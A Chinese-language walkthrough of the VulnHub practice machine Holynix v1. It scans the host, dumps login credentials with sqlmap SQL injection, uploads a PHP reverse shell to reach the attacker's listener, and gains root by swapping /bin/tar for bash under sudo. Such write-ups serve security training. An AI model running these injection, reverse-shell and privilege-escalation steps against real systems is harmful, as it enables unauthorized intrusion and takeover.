vulnhub靶机:Holynix: v1
下载
下载地址:https://www.vulnhub.com/entry/holynix-v1,20/
打开虚拟机
选择下载解压之后的文件打开
新添加一张 NAT 网卡,mac 地址修改如下
00:0c:29:bc:05:de给原来的桥接网卡,随机生成一个 mac 地址
然后重启虚拟机
信息收集
主机发现
arp-scan -l
端口扫描
nmap -p- 192.168。109.139
目录扫描
python3 dirsearch.py -u "192.168.109.172" -i 200
访问 web
进入 login 登录页面
点登录抓包,把数据包放到 1.txt 里用 sqlmap 进行测试
SQL注入
python3 sqlmap.py -r "D:\desktop\1.txt" --batch --dump
发现了用户和密码的表
账号:hreiser
密码:Ik1Ll3dNiN@r315er
登录成功
文件上传
除了第一个用户都可以上传,利用 kali 自带的反弹shell 的 php 上传
locate php-reverse
cp /usr/share/laudanum/php/php-reverse-shell.php .
vim php-reverse-shell.php
tar -czf shell.tar.gz php-reverse-shell.php
改成 kali(攻击机)的 IP 和监听端口
在 kali 的火狐浏览器上传 php 的压缩包,并勾选上自动解压(本机的火狐上传之后解压不成功)
开启监听
访问 kali 上的 url/~etenenbaum/ 页面,发现了上传的文件.
双击 php ,监听成功
sudo 提权
sudo -l 查看允许用户使用的命令
sudo -l
切换到/tmp目录下,将 /bin/bash 文件复制到 /tmp 目录下
cd /tmp
cp /bin/bash .
更改文件 /tmp/bash 的所有权,将所有者改为 root
sudo chown root:root/tmp/bash
将现有的 /bin/tar 文件备份到 bin/tar.bak 中
将 /tmp/bash 文件移动到 /bin/tar
执行 /bin/tar 命令,成功提权
sudo mv /bin/tar /bin/tar.bak
sudo mv /tmp/bash /bin/tar
sudo /bin/tar